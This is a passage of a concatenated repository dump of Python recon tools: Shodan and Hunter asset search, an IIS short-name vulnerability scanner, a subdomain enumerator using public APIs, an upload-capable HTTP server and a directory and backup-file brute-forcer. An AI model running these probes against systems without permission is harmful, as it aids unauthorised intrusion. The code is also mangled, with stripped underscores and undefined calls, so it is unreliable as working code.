__SearchByhunter(self,page=1): 54 | if not self.hunter or page > 5: 55 | return self.hunter 56 | reRule = {"^hash_icon=":"icon="} 57 | keyword = self.keyword 58 | for k,v in reRule.items(): 59 | keyword = re.sub(k,v,keyword) 60 | keyword = base64.b64encode(keyword.encode()).decode() 61 | total = 0 62 | #data/arr[]/url,ip,port,web_title,domain.cpmpany,number 63 | displayFields = ["ip","port","domain","web_title","company","number"] 64 | api_url = "https://hunter.qianxin.com/openApi/search?username={username}&api-key={key}&search={b64_keyword}&page={page}&page_size=100&is_web=3" 65 | url = api_url.format(username=config.hunter_username,key=config.hunter_key,b64_keyword=keyword,page=page) 66 | result = self.sendReq(url) 67 | if result: 68 | result = json.loads(result) 69 | if not result or not result.get("data",{}): 70 | return False 71 | datalist = result.get("data",{}).get("arr",[]) 72 | for a in datalist: 73 | out = [] 74 | for j in displayFields: 75 | out.append(a.get(j,"")) 76 | print(out) 77 | total = result.get("data",{}).get("total",0) 78 | if int(total) > page * 50: 79 | time.sleep(2) 80 | page = page + 1 81 | self.SearchByhunter(page) 82 | 83 | def SearchByshodan(self,page=1): 84 | if not self.shodan: 85 | return self.shodan 86 | reRule = {"^body=":"http.html:","^title=":"http.title:","^icon_hash=|icon=":"http.favicon.hash:"} 87 | keyword = self.keyword 88 | for k,v in reRule.items(): 89 | keyword = re.sub(k,v,keyword) 90 | keyword = requests.utils.quote(keyword) 91 | displayFields = ["ip_str","port","host","title","hostnames","org"] 92 | api_url = "https://api.shodan.io/shodan/host/search?query={keyword}&key={key}" 93 | url = api_url.format(key=config.shodan_key,keyword=keyword) 94 | result = self.sendReq(url) 95 | if result: 96 | result = json.loads(result) 97 | for a in result.get("matches",[]): 98 | out = [] 99 | for j in displayFields: 100 | out.append(a.get(j,"")) 101 | print(out) 102 | 103 | 104 | if name == 'main': 105 | searchObj = bigData(sys.argv[1]) 106 | searchObj.importAuth() 107 | for m in dir(searchObj): 108 | if "searchby" in m.lower(): 109 | f = getattr(searchObj,m) 110 | __f() 111 | -------------------------------------------------------------------------------- /iis_shortname_Scan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding:utf-8 3 | # An IIS short_name scanner my[at]lijiejie.com http://www.lijiejie.com 4 | 5 | 6 | import sys 7 | import httplib 8 | import urlparse 9 | import threading 10 | import Queue 11 | import time 12 | 13 | 14 | class Scanner(): 15 | def init(self, target): 16 | self.target = target.lower() 17 | if not self.target.startswith('http'): 18 | self.target = 'http://%s' % self.target 19 | self.scheme, self.netloc, self.path, params, query, fragment = \ 20 | urlparse.urlparse(target) 21 | if self.path[-1:] != '/': # ends with slash 22 | self.path += '/' 23 | self.alphanum = 'abcdefghijklmnopqrstuvwxyz0123456789_-' 24 | self.files = [] 25 | self.dirs = [] 26 | self.queue = Queue.Queue() 27 | self.lock = threading.Lock() 28 | self.threads = [] 29 | self.request_method = '' 30 | self.msg_queue = Queue.Queue() 31 | self.STOP_ME = False 32 | threading.Thread(target=self._print).start() 33 | 34 | def _conn(self): 35 | try: 36 | if self.scheme == 'https': 37 | conn = httplib.HTTPSConnection(self.netloc) 38 | else: 39 | conn = httplib.HTTPConnection(self.netloc) 40 | return conn 41 | except Exception, e: 42 | print '[_conn.Exception]', e 43 | return None 44 | 45 | def _get_status(self, path): 46 | #try: 47 | conn = self._conn() 48 | conn.request(self.request_method, path) 49 | r = conn.getresponse() 50 | if 'Server Error' in r.reason: 51 | status = 500 52 | else: 53 | status = r.status 54 | conn.close() 55 | return status 56 | #except Exception, e: 57 | # raise Exception('[_get_status.Exception] %s' % str(e) ) 58 | 59 | def is_vul(self): 60 | #try: 61 | for _method in ['GET', 'OPTIONS']: 62 | self.request_method = _method 63 | status_1 = self._get_status(self.path + '/~1/1.aspx') # an existed file/folder 64 | status_2 = self._get_status(self.path + '/faaedi~1/a.aspx') # not existed file/folder 65 | print(status_2) 66 | if status_1 == 404 and status_2 != 404: 67 | return True 68 | return False 69 | #except Exception, e: 70 | # #raise Exception('[is_vul.Exception] %s' % str(e) ) 71 | # print(e) 72 | 73 | def run(self): 74 | for c in self.alphanum: 75 | self.queue.put( (self.path + c, '.') ) # filename, extension 76 | for i in range(20): 77 | t = threading.Thread(target=self._scan_worker) 78 | self.threads.append(t) 79 | t.start() 80 | for t in self.threads: 81 | t.join() 82 | self.STOP_ME = True 83 | 84 | def report(self): 85 | print '-'* 64 86 | for d in self.dirs: 87 | print 'Dir: %s' % d 88 | for f in self.files: 89 | print 'File: %s' % f 90 | print '-'64 91 | print '%d Directories, %d Files found in total' % (len(self.dirs), len(self.files)) 92 | print 'Note that is a wildcard, matches any character zero or more times.' 93 | 94 | def _print(self): 95 | while not self.STOP_ME or (not self.msg_queue.empty()): 96 | if self.msg_queue.empty(): 97 | time.sleep(0.05) 98 | else: 99 | print self.msg_queue.get() 100 | 101 | def _scan_worker(self): 102 | while True: 103 | try: 104 | url, ext = self.queue.get(timeout=1.0) 105 | status = self._get_status(url + '~1' + ext + '/1.aspx') 106 | if status == 404: 107 | self.msg_queue.put('[+] %s~1%s\t[scan in progress]' % (url, ext)) 108 | 109 | if len(url) - len(self.path)< 6: # enum first 6 chars only 110 | for c in self.alphanum: 111 | self.queue.put( (url + c, ext) ) 112 | else: 113 | if ext == '.': 114 | self.queue.put( (url, '') ) 115 | 116 | if ext == '': 117 | self.dirs.append(url + '~1') 118 | self.msg_queue.put('[+] Directory ' + url + '~1\t[Done]') 119 | 120 | elif len(ext) == 5 or (not ext.endswith('')): # .asp 121 | self.files.append(url + '~1' + ext) 122 | self.msg_queue.put('[+] File ' + url + '~1' + ext + '\t[Done]') 123 | 124 | else: 125 | for c in 'abcdefghijklmnopqrstuvwxyz0123456789': 126 | self.queue.put( (url, ext[:-1] + c + '') ) 127 | if len(ext) < 4: # < len('.as') 128 | self.queue.put( (url, ext[:-1] + c) ) 129 | 130 | except Queue.Empty,e: 131 | break 132 | except Exception, e: 133 | print '[Exception]', e 134 | 135 | 136 | if name == 'main': 137 | if len(sys.argv) == 1: 138 | print 'Usage: python IIS_shortname_Scan.py http://www.target.com/' 139 | sys.exit() 140 | 141 | target = sys.argv[1] 142 | s = Scanner(target) 143 | if not s.is_vul(): 144 | s.STOP_ME = True 145 | print 'Server is not vulnerable' 146 | sys.exit(0) 147 | 148 | print 'Server is vulnerable, please wait, scanning...' 149 | s.run() 150 | s.report() 151 | -------------------------------------------------------------------------------- /sub.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import re 3 | import socket 4 | import time 5 | import sys 6 | import urllib3 7 | import json 8 | try: 9 | import fofa 10 | except: 11 | sys.argv.append('--sub') 12 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 13 | try: 14 | import config 15 | keys = config.dir() 16 | if "vt_key" in keys: 17 | vt_key = config.vt_key 18 | else: 19 | vt_key="" 20 | if "sec_keys" in keys: 21 | #是数组，这个接口只有第个月只有50次，需要多个key 22 | sec_keys = config.sec_keys 23 | else: 24 | sec_keys=[] 25 | except: 26 | print("未发现接口key") 27 | 28 | 29 | 30 | class subdomain: 31 | def init(self): 32 | self.api_list = [ 33 | {'method':'get','url':"https://site.ip138.com/{target}/domain.htm",'data':"ok=1",'headers':{},'re':"/([a-zA-Z0-9_\-\.]?{target})/"}, 34 | {'method': 'get', 'url': "http://ce.baidu.com/index/getRelatedSites", 35 | 'data': "site_address={target}", 'headers': {}, 're': "domain\":\"([a-zA-Z0-9_\-\.]?)\","}, #baidu接 36 | {'method':'get','url':"https://www.virustotal.com/vtapi/v2/domain/report",'data':"apikey=%s&domain={target}" % vt_key,'headers':{'Origin': 'https://developers.virustotal.com'},'re':"\"([a-zA-Z0-9_\-\.]?)\","}, 37 | {"method":"get","url":"https://crt.sh/","data":"q=%.{target}&output=json","headers":{"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8"},"re":"name_value\":\"([a-zA-Z0-9_\-\.]?)\""}, 38 | {"method":"post","url":"https://hackertarget.com/find-dns-host-records/","data":"theinput={target}&thetest=hostsearch&name_of_nonce_field=8a94567cc2","headers":{},"re":"([a-zA-Z0-9_\-\.]?{target}),"}, 39 | {'method':'get','url':"https://rapiddns.io/subdomain/{target}#result",'data':"ok=2",'headers':{"User-Agent": "curl/7.64.1","Referer": "https://rapiddns.io/subdomain"},'re':"//([a-zA-Z0-9_\-\.]?{target})\""}, 40 | {'method':'get','url':"https://dns.bufferover.run/dns?q=.{target}",'data':"ok=2",'headers':{"User-Agent": "curl/7.64.1","Referer": "https://dns.bufferover.run"},'re':",([a-zA-Z0-9_\-\.]?{target})\""}, 41 | {'method':'get','url':"https://searchdns.netcraft.com/?host={target}&restriction=site contains",'data':"ok=2",'headers':{"User-Agent": "curl/7.64.1","Referer": "https://searchdns.netcraft.com"},'re':"//([a-zA-Z0-9_\-\.]?{target})\""}, 42 | {'method':'get','url':"https://otx.alienvault.com/api/v1/indicators/domain/{target}/passive_dns",'data':"ok=1",'headers':{},'re':"\"([a-zA-Z0-9_\-\.]?{target})\","}, 43 | {'method':'get','url':"https://api.certspotter.com/v1/issuances?domain={target}&include_subdomains=true&expand=dns_names",'data':"ok=1",'headers':{},'re':"\"([a-zA-Z0-9_\-\.]?{target})\""}, 44 | {'method':'get','url':"https://sonar.omnisint.io/subdomains/{target}",'data':"ok=1",'headers':{},'re':"\"([a-zA-Z0-9_\-\.]?{target})\","}, 45 | {'method':'get','url':"https://www.threatcrowd.org/searchApi/v2/domain/report/?domain={target}",'data':"ok=1",'headers':{},'re':"\"([a-zA-Z0-9_\-\.]?{target})\","}, 46 | {'method':'get','url':"https://api.threatminer.org/v2/domain.php?q={target}&rt=5",'data':"ok=1",'headers':{},'re':"\"([a-zA-Z0-9_\-\.]?{target})\""}, 47 | {'method':'get','url':"http://web.archive.org/cdx/search/cdx?url=.{target}/&output=txt&fl=original&collapse=urlkey",'data':"ok=1",'headers':{},'re':"//([a-zA-Z0-9_\-\.]?{target})/"}, 48 | 49 | 50 | 51 | ] # api接口列表 52 | self.domain = "" 53 | #self.start(self.domain) 54 | def securitytrails_api(self,domain): 55 | api_url = "https://api.securitytrails.com/v1/domain/%s/subdomains?children_only=false" % domain 56 | for key in sec_keys: 57 | headers = { 58 | 'accept': "application/json", 59 | 'apikey': key, 60 | } 61 | try: 62 | req = requests.get(api_url,headers,timeout=60,verify=False) 63 | except: 64 | return [] 65 | if req.status_code == 200: 66 | json_text = json.loads(req.text) 67 | if "subdomains" not in json_text.keys(): 68 | continue 69 | subs = json_text['subdomains'] 70 | subdomains = [sub+"."+domain for sub in subs] 71 | return subdomains 72 | return [] 73 | 74 | 75 | def req_text(self, method, url, data, headers): 76 | if not headers: 77 | headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36', 78 | 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 79 | } 80 | if method.upper() == 'GET': 81 | url = url.strip()+'?'+data.strip() 82 | try: 83 | 84 | req = requests.get(url, headers=headers,timeout=60,verify=False) 85 | except: 86 | return "" 87 | elif method.upper() == 'POST': 88 | try: 89 | req = requests.post(url, data, headers=headers,timeout=60,verify=False) 90 | except: 91 | return "" 92 | else: 93 | return "" 94 | if req.status_code == 200: 95 | text = req.text 96 | else: 97 | text = "" 98 | return text 99 | 100 | def get_domains(self,reStr,text): 101 | temp = [] 102 | r = re.compile(reStr) 103 | r1 = re.findall(r,text) 104 | if r1: 105 | for subdomain in r1: 106 | if self.domain in subdomain: 107 | temp.append(subdomain) 108 | return temp 109 | return [] 110 | 111 | def api_start(self,domain): 112 | subdomains = [] 113 | subdomains = subdomains + self.securitytrails_api(domain) 114 | subip={} 115 | for api in self.api_list: 116 | data=api['data'].replace('{target}',domain) 117 | url = api['url'].replace('{target}',domain) 118 | text = self.req_text(api['method'],url,data,api['headers']) 119 | re_domain_list = self.get_domains(api['re'].replace("{target}",domain),text) 120 | if re_domain_list: 121 | subdomains = subdomains + re_domain_list 122 | return subdomains 123 | 124 | 125 | 126 | if name == 'main': 127 | domain = sys.argv[1] 128 | sub = subdomain() 129 | s = sub.api_start(domain) 130 | for s1 in list(set(s)): 131 | if domain in s1: 132 | print(s1) 133 | if '--sub' in sys.argv: 134 | exit() 135 | print("-"30 + "fofa search" + "-"30) 136 | fofa.search("domain=\"%s\"||cert=\"%s\"" % (domain,domain)) 137 | -------------------------------------------------------------------------------- /simple_http.py2: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -- coding: UTF-8 -- 3 | 4 | """Simple HTTP Server With Upload. 5 | This module builds on BaseHTTPServer by implementing the standard GET 6 | and HEAD requests in a fairly straightforward manner. 7 | """ 8 | 9 | version = "1.0.0" 10 | author = "freelamb" 11 | all = ["SimpleHTTPRequestHandler"] 12 | 13 | import os 14 | import sys 15 | import posixpath 16 | import BaseHTTPServer 17 | import urllib 18 | import cgi 19 | import shutil 20 | import mimetypes 21 | import re 22 | 23 | try: 24 | from cStringIO import StringIO 25 | except ImportError: 26 | from StringIO import StringIO 27 | 28 | 29 | class SimpleHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): 30 | """Simple HTTP request handler with GET/HEAD/POST commands. 31 | This serves files from the current directory and any of its 32 | subdirectories. The MIME type for files is determined by 33 | calling the .guess_type() method. And can receive file uploaded 34 | by client. 35 | The GET/HEAD/POST requests are identical except that the HEAD 36 | request omits the actual contents of the file. 37 | """ 38 | 39 | server_version = "simple_http_server/" + version 40 | 41 | def do_GET(self): 42 | """Serve a GET request.""" 43 | fd = self.send_head() 44 | if fd: 45 | shutil.copyfileobj(fd, self.wfile) 46 | fd.close() 47 | 48 | def do_HEAD(self): 49 | """Serve a HEAD request.""" 50 | fd = self.send_head() 51 | if fd: 52 | fd.close() 53 | 54 | def do_POST(self): 55 | """Serve a POST request.""" 56 | r, info = self.deal_post_data() 57 | print r, info, "by: ", self.client_address 58 | f = StringIO() 59 | f.write('') 60 | f.write("\nUpload Result Page\n") 61 | f.write("\n
Upload Result Page
\n") 62 | f.write("
\n") 63 | if r: 64 | f.write("Success:") 65 | else: 66 | f.write("Failed:") 67 | f.write(info) 68 | f.write("
back" % self.headers['referer']) 69 | f.write("
Powered By: freelamb, check new version at ") 70 | f.write("") 71 | f.write("here.\n\n") 72 | length = f.tell() 73 | f.seek(0) 74 | self.send_response(200) 75 | self.send_header("Content-type", "text/html") 76 | self.send_header("Content-Length", str(length)) 77 | self.end_headers() 78 | if f: 79 | shutil.copyfileobj(f, self.wfile) 80 | f.close() 81 | 82 | def deal_post_data(self): 83 | boundary = self.headers.plisttext.split("=")[1] 84 | remain_bytes = int(self.headers['content-length']) 85 | line = self.rfile.readline() 86 | remain_bytes -= len(line) 87 | if boundary not in line: 88 | return False, "Content NOT begin with boundary" 89 | line = self.rfile.readline() 90 | remain_bytes -= len(line) 91 | fn = re.findall(r'Content-Disposition.name="file"; filename="(.)"', line) 92 | if not fn: 93 | return False, "Can't find out file name..." 94 | path = translate_path(self.path) 95 | fn = os.path.join(path, fn[0]) 96 | while os.path.exists(fn): 97 | fn += "_" 98 | line = self.rfile.readline() 99 | remain_bytes -= len(line) 100 | line = self.rfile.readline() 101 | remain_bytes -= len(line) 102 | try: 103 | out = open(fn, 'wb') 104 | except IOError: 105 | return False, "Can't create file to write, do you have permission to write?" 106 | 107 | pre_line = self.rfile.readline() 108 | remain_bytes -= len(pre_line) 109 | while remain_bytes > 0: 110 | line = self.rfile.readline() 111 | remain_bytes -= len(line) 112 | if boundary in line: 113 | pre_line = pre_line[0:-1] 114 | if pre_line.endswith('\r'): 115 | pre_line = pre_line[0:-1] 116 | out.write(pre_line) 117 | out.close() 118 | return True, "File '%s' upload success!" % fn 119 | else: 120 | out.write(pre_line) 121 | pre_line = line 122 | return False, "Unexpect Ends of data." 123 | 124 | def send_head(self): 125 | """Common code for GET and HEAD commands. 126 | This sends the response code and MIME headers. 127 | Return value is either a file object (which has to be copied 128 | to the output file by the caller unless the command was HEAD, 129 | and must be closed by the caller under all circumstances), or 130 | None, in which case the caller has nothing further to do. 131 | """ 132 | path = translate_path(self.path) 133 | if os.path.isdir(path): 134 | if not self.path.endswith('/'): 135 | # redirect browser - doing basically what apache does 136 | self.send_response(301) 137 | self.send_header("Location", self.path + "/") 138 | self.end_headers() 139 | return None 140 | for index in "index.html", "index.htm": 141 | index = os.path.join(path, index) 142 | if os.path.exists(index): 143 | path = index 144 | break 145 | else: 146 | return self.list_directory(path) 147 | content_type = self.guess_type(path) 148 | try: 149 | # Always read in binary mode. Opening files in text mode may cause 150 | # newline translations, making the actual size of the content 151 | # transmitted less than the content-length! 152 | f = open(path, 'rb') 153 | except IOError: 154 | self.send_error(404, "File not found") 155 | return None 156 | self.send_response(200) 157 | self.send_header("Content-type", content_type) 158 | fs = os.fstat(f.fileno()) 159 | self.send_header("Content-Length", str(fs[6])) 160 | self.send_header("Last-Modified", self.date_time_string(fs.st_mtime)) 161 | self.end_headers() 162 | return f 163 | 164 | def list_directory(self, path): 165 | """Helper to produce a directory listing (absent index.html). 166 | Return value is either a file object, or None (indicating an 167 | error). In either case, the headers are sent, making the 168 | interface the same as for send_head(). 169 | """ 170 | try: 171 | list_dir = os.listdir(path) 172 | except os.error: 173 | self.send_error(404, "No permission to list directory") 174 | return None 175 | list_dir.sort(key=lambda a: a.lower()) 176 | f = StringIO() 177 | display_path = cgi.escape(urllib.unquote(self.path)) 178 | f.write('') 179 | f.write("\nDirectory listing for %s\n" % display_path) 180 | f.write("\n
Directory listing for %s
\n" % display_path) 181 | f.write("
\n") 182 | f.write("
") 183 | f.write("") 184 | f.write("
\n") 185 | f.write("
\n
\n") 186 | for name in list_dir: 187 | fullname = os.path.join(path, name) 188 | display_name = linkname = name 189 | # Append / for directories or @ for symbolic links 190 | if os.path.isdir(fullname): 191 | display_name = name + "/" 192 | linkname = name + "/" 193 | if os.path.islink(fullname): 194 | display_name = name + "@" 195 | # Note: a link to a directory displays with @ and links with / 196 | f.write('
%s\n' % (urllib.quote(linkname), cgi.escape(display_name))) 197 | f.write("
\n
\n\n\n") 198 | length = f.tell() 199 | f.seek(0) 200 | self.send_response(200) 201 | self.send_header("Content-type", "text/html") 202 | self.send_header("Content-Length", str(length)) 203 | self.end_headers() 204 | return f 205 | 206 | def guess_type(self, path): 207 | """Guess the type of a file. 208 | Argument is a PATH (a filename). 209 | Return value is a string of the form type/subtype, 210 | usable for a MIME Content-type header. 211 | The default implementation looks the file's extension 212 | up in the table self.extensions_map, using application/octet-stream 213 | as a default; however it would be permissible (if 214 | slow) to look inside the data to make a better guess. 215 | """ 216 | 217 | base, ext = posixpath.splitext(path) 218 | if ext in self.extensions_map: 219 | return self.extensions_map[ext] 220 | ext = ext.lower() 221 | if ext in self.extensions_map: 222 | return self.extensions_map[ext] 223 | else: 224 | return self.extensions_map[''] 225 | 226 | if not mimetypes.inited: 227 | mimetypes.init() # try to read system mime.types 228 | extensions_map = mimetypes.types_map.copy() 229 | extensions_map.update({ 230 | '': 'application/octet-stream', # Default 231 | '.py': 'text/plain', 232 | '.c': 'text/plain', 233 | '.h': 'text/plain', 234 | }) 235 | 236 | 237 | def translate_path(path): 238 | """Translate a /-separated PATH to the local filename syntax. 239 | Components that mean special things to the local file system 240 | (e.g. drive or directory names) are ignored. (XXX They should 241 | probably be diagnosed.) 242 | """ 243 | # abandon query parameters 244 | path = path.split('?', 1)[0] 245 | path = path.split('#', 1)[0] 246 | path = posixpath.normpath(urllib.unquote(path)) 247 | words = path.split('/') 248 | words = filter(None, words) 249 | path = os.getcwd() 250 | for word in words: 251 | drive, word = os.path.splitdrive(word) 252 | head, word = os.path.split(word) 253 | if word in (os.curdir, os.pardir): 254 | continue 255 | path = os.path.join(path, word) 256 | return path 257 | 258 | 259 | def main(): 260 | # BaseHTTPServer.test(SimpleHTTPRequestHandler, BaseHTTPServer.HTTPServer) 261 | if sys.argv[1:]: 262 | port = int(sys.argv[1]) 263 | else: 264 | port = 8000 265 | server_address = ('', port) 266 | 267 | SimpleHTTPRequestHandler.protocol_version = "HTTP/1.0" 268 | httpd = BaseHTTPServer.HTTPServer(server_address, SimpleHTTPRequestHandler) 269 | 270 | sa = httpd.socket.getsockname() 271 | print "Serving HTTP on", sa[0], "port", sa[1], "..." 272 | httpd.serve_forever() 273 | 274 | 275 | if name == 'main': 276 | main() 277 | 278 | -------------------------------------------------------------------------------- /dirScan/dirScan.py: -------------------------------------------------------------------------------- 1 | import threading 2 | import re 3 | import requests 4 | import time 5 | import math 6 | import sys 7 | import queue 8 | import os 9 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 10 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 11 | class dirScan: 12 | def init(self): 13 | self.proxy = None 14 | self.timeout = 10 15 | self.headers = { 16 | "Accept":"text/html,application/xhtml+xml,application/xml;", 17 | "Accept-Encoding":"gzip", 18 | "Accept-Language":"zh-CN,zh;q=0.8", 19 | "Referer":"https://www.baidu.com/", 20 | "User-Agent":"Mozilla/5.0 (Linux;u;Android 4.2.2;zh-cn;) AppleWebKit/534.46 (KHTML,like Gecko) Version/5.1 Mobile Safari/10600.6.3 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" 21 | } 22 | #self.url_keyword_file = 'weblogic.dict'#'url_test.dict' 23 | self.url_keyword_file = 'dirname2.dict'#'url_test.dict' 24 | #self.file_keyword_file = 'filename2.dict'#'file_test.dict' 25 | self.file_keyword_file = 'filename2.dict'#'file_test.dict' 26 | self.thread_num = 10 27 | self.save_file_keywords = [''] 28 | self.save_url_keywords = [''] 29 | self.target_url = "http://baidu.com" 30 | self.scan_level = -1 31 | self.file_ext = 'php' 32 | self.bak_ext = ['zip','rar','tar','tar.gz','bak','tar.bz2'] 33 | self.tmp_ext = ['old','log','bak','swp'] 34 | self.STOP_FILE = False #禁止文件扫描 35 | self.STOP_URL = False #禁止目录扫描 36 | self.status_code = [200,403,500] 37 | self.msg_queue = queue.Queue()#消息日志队列 38 | self.target_queue = queue.Queue()#待扫描URL队列 39 | self.re_keyword = False #对文件内容进行匹配，基于正则。对抗404重定向 40 | self.STOP_ME = False 41 | self.ignore_case = True #忽略目标大小写 42 | self.__no_check = True 43 | self.request_method = "get" #请求方式 44 | self.request_error_max = 12 #最大连接错误次数 45 | self.request_error_count =0 #当访问成功后会被重置为0 46 | threading.Thread(target=self._print_msg).start()#日志输出 47 | 48 | def _check_404(self,host): 49 | if self.__no_check: 50 | return 51 | url = host + "/check_404_"+str(int(time.time())) 52 | code = self._req_code(url) 53 | if code in [200,520]: 54 | return True 55 | 56 | def _req_code(self,url): 57 | url = url if url[:4] == 'http' else 'http://' + url 58 | try: 59 | if self.request_method.lower() not in ["get","head","post","put","delete"]: 60 | exit("请求方式不存在") 61 | if self.proxy: 62 | __mreq = getattr(requests,self.request_method) 63 | req = __req(url,headers=self.headers,timeout=self.timeout,proxies=self.proxy,verify=False,allow_redirects=False) 64 | 65 | else: 66 | __mreq = getattr(requests,self.request_method) 67 | req = __mreq(url,headers=self.headers,timeout=self.timeout,verify=False,allow_redirects=False) 68 | if self.re_keyword and self.request_method in ["get","post"]: 69 | r=re.compile(self.re_keyword) 70 | if not r.search(req.text): 71 | code = 200 72 | else: 73 | code = 404 74 | else: 75 | code = req.status_code 76 | self.request_error_count = 0 77 | except Exception as e: 78 | code = 520 #网络不可达 79 | self.request_error_count = self.request_error_count + 1 80 | return code 81 | 82 | def _get_urlkeyword(self): 83 | f = open(self.url_keyword_file,'r') 84 | url_keywords = f.readlines() 85 | f.close() 86 | if self.ignore_case: 87 | return list(set([i.strip().lower() for i in url_keywords])) 88 | else: 89 | return [i.strip() for i in url_keywords] 90 | 91 | def _get_filekeyword(self): 92 | f = open(self.file_keyword_file,'r') 93 | file_keywords = f.readlines() 94 | f.close() 95 | if self.ignore_case: 96 | return list(set([i.strip().lower() for i in file_keywords])) 97 | else: 98 | return [i.strip() for i in file_keywords] 99 | 100 | def _get_console_width(self): 101 | return int(os.get_terminal_size().columns) 102 | 103 | def _get_script_language(self,url): 104 | php = url + '/index.php' 105 | asp = url + '/index.asp' 106 | aspx = url + '/index.aspx' 107 | jsp = url + '/index.jsp' 108 | scripts = {'asp':asp,'aspx':aspx,'php':php,'jsp':jsp} 109 | for k,v in scripts.items(): 110 | if self._req_code(v) in self.status_code: 111 | return k 112 | return 'php' 113 | 114 | def _zh_len(self,zhstr): 115 | """len在判断中文中度时不正确的问题""" 116 | row_l=len(zhstr) 117 | utf8_l=len(zhstr.encode('utf-8')) 118 | return int((utf8_l-row_l)/2+row_l) 119 | 120 | def _print_msg(self): 121 | _console_width = self._get_console_width() 122 | while not self.STOP_ME: 123 | try: 124 | _msg = self.msg_queue.get(timeout=0.1) 125 | except: 126 | continue 127 | if _msg[:4] == 'true': 128 | sys.stdout.write('\r'+_msg[4:].ljust(_console_width-1)+'\n') 129 | else: 130 | 131 | sys.stdout.write('\r'+_msg.ljust(_console_width-(self._zh_len(_msg)-len(_msg)))) 132 | if self.request_error_count > self.request_error_max: 133 | self.STOP_ME = True 134 | print("请求错误次数太多! Count: %s" % self.request_error_count) 135 | 136 | 137 | def set_proxy(self,proxy): 138 | """设置代理{'http':'http://127.0.0.1:8080','https','https://127.0.0.1:8080'}""" 139 | self.proxy = proxy 140 | 141 | def set_timeout(self,t): 142 | """设置请求超时时间""" 143 | self.timeout = t 144 | 145 | def set_request_error_max(self,i): 146 | """设置最大请求错误次数""" 147 | self.request_error_max = int(i) 148 | 149 | def set_stop_me(self,t=True): 150 | """关闭输出""" 151 | self.STOP_ME=t 152 | 153 | def set_headers(self,headers): 154 | """设置headers头dict类型""" 155 | self.headers = headers 156 | 157 | def set_url_keyword_file(self,path): 158 | """"扫路径的字典""" 159 | self.url_keyword_file = path 160 | 161 | def set_file_keyword_file(self,path): 162 | """扫文件的字典""" 163 | self.file_keyword_file=path 164 | 165 | def set_thread(self,num): 166 | """设置线程""" 167 | self.thread_num = num 168 | 169 | def set_target_url(self,url): 170 | """设置扫描目标""" 171 | self.target_url = url 172 | 173 | def set_scan_level(self,level): 174 | """设置扫描深度,默认无限(-1)""" 175 | self.scan_level = level 176 | 177 | def set_file_ext(self,ext): 178 | """设置文件后缀""" 179 | self.file_ext = str(ext) 180 | 181 | def set_stop_file(self,bo = True): 182 | """是否扫描文件,默认开启""" 183 | self.STOP_FILE = bo 184 | 185 | def set_stop_url(self,bo = True): 186 | """是否扫描目录,默认开启""" 187 | self.STOP_URL = bo 188 | def set_status_code(self,codes): 189 | """设置返回正常的状态码""" 190 | self.status_code = codes 191 | print(self.status_code) 192 | 193 | def set_url_scan_file(self,path): 194 | """设置目录扫描字典文件路径""" 195 | self.url_keyword_file = path 196 | 197 | def set_file_scan_file(self,path): 198 | """设置文件扫描字典文件路径""" 199 | self.file_keyword_file = path 200 | 201 | def set_not_ignore_case(self): 202 | """ 设置是否忽律大小写""" 203 | self.ignore_case = False 204 | 205 | def set_re_keyword(self,re): 206 | """ 当开启404重定向时，对返回包进行正则匹配来判断页面是否存在""" 207 | self.re_keyword = re 208 | 209 | def set_request_method(self,method="get"): 210 | self.request_method = method.lower() 211 | 212 | def url_keyword_scan(self): 213 | while not self.STOP_ME and not self.target_queue.empty(): 214 | key = self.target_queue.get() 215 | key = key.strip() 216 | url = self.target_url + key if self.target_url[-1] == '/' or key[0] == '/' else self.target_url+ '/' + key 217 | self.msg_queue.put("Queue: %s<-->%s"%(self.target_queue.qsize(),url)) 218 | code = self._req_code(url) 219 | if int(code) in self.status_code: 220 | self.msg_queue.put('true'+url) 221 | if url.split('/')[-1].find('.') == -1: #判断是文件还是目录 222 | if self.scan_level > key.count('/'):#利用/来判断当前目标深度 223 | if not self.STOP_FILE: 224 | self.saveKey_and_fileKey([key]) 225 | if not self.STOP_URL: 226 | self.saveKey_and_urlKey([key]) 227 | else: 228 | for ext in self.tmp_ext: #加入备份文件的可能 229 | self.target_queue.put(key+'.'+ext) 230 | 231 | def saveKey_and_urlKey(self,keywords): 232 | """合成扫描路径字典""" 233 | and_keys = [] 234 | urlkeys = self._get_urlkeyword() 235 | for uk in urlkeys: 236 | for sk in keywords: 237 | self.target_queue.put(sk+'/'+uk) 238 | 239 | def saveKey_and_fileKey(self,keywords): 240 | """合成扫描文件字典""" 241 | and_keys = [] 242 | filekeys = self._get_filekeyword() 243 | for fk in filekeys: 244 | for sk in keywords: 245 | self.target_queue.put(sk+'/'+fk+'.'+self.file_ext) 246 | for sk in keywords: #加入目录名为备份的可能 247 | for ext in self.bak_ext: 248 | if not sk.endswith("."+ext):#避免重复检测死循环a.bak a.bak.bak a.bak.bak.bak 249 | self.target_queue.put(sk+'/'+sk.split('/')[-1]+'.'+ext) 250 | self.target_queue.put('/'.join(sk.split('/')[:-1])+'/'+sk.split('/')[-1]+'.'+ext) 251 | 252 | def scan(self,urls,ext=False): 253 | for url in urls: 254 | url = url.strip() 255 | self.set_target_url(url) 256 | if not self.re_keyword: 257 | if self._check_404(url): 258 | self.msg_queue.put("true目标(%s)有404跳转或没有网络" % url) 259 | continue 260 | if ext: 261 | self.set_file_ext(ext) 262 | else: 263 | self.set_file_ext(self._get_script_language(self.target_url)) 264 | #首次初始化,因队列先进先出，尽量不要改变顺序 265 | if not self.STOP_FILE: 266 | self.saveKey_and_fileKey(['']) 267 | if not self.STOP_URL: 268 | self.saveKey_and_urlKey(['']) 269 | thread_list=[] 270 | for n in range(self.thread_num+1): 271 | thread_list.append(threading.Thread(target=self.url_keyword_scan)) 272 | for t in thread_list: 273 | t.start() 274 | for t in thread_list: 275 | t.join() 276 | 